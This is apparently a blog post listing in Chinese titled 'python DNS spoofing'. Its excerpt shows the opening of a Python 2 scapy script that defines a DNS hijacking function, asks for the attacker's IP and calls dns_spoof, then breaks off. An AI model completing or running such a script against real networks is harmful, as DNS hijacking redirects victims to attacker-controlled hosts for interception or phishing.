python dns欺骗
摘要:
'''' from scapy.all import * from threading import Thread def DNShijacking(): global wg wg=raw_input('Please enter your IP:') print '[+]dns spoof!' nwdf=dns_spoof(joker='{}'.format(wg... 阅读全文
posted @ 2018-04-01 14:58 东京$ 阅读(1489) 评论(0) 推荐(0)